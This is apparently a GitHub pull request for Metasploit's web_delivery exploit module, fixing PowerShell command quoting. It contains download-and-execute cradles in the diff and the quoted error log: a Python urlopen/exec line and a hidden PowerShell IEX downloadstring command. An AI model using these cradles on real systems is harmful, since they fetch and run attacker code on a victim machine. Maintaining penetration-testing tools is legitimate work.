### PR TITLE
web_delivery.rb powershell module should handle curly-based options

### DIFF
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
       print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
     when 'PSH'
       ignore_cert = Rex::Exploitation::Powershell::PshMethods.ignore_ssl_certificate if ssl
-      download_and_run = "#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{url}'))"
+      download_and_run = "{#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{url}'))}"
       print_line generate_psh_command_line(
                                              noprofile: true,
                                              windowstyle: 'hidden',


### PR DESCRIPTION
Recent metasploit update or (something in windows) seemed to break web delivery.

Added the { }at the 92 line download_and_run = "{#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{url}'))}"
seems to fix it.

 Along with a change to powershell.rb -w parameter to -win due to the following error:

```
"powershell.exe : Invoke-Expression : Parameter cannot be processed because the 
parameter name 
At line:1 char:1
+ powershell.exe -nop -w hidden -c IEX ((new-object 
net.webclient).downl ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```

```
+ CategoryInfo          : NotSpecified: (Invoke-Expressi...parameter name  
```

   :String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

'w' is ambiguous. Possible matches include: -WarningAction -WarningVariable.
At line:1 char:25""

```
```
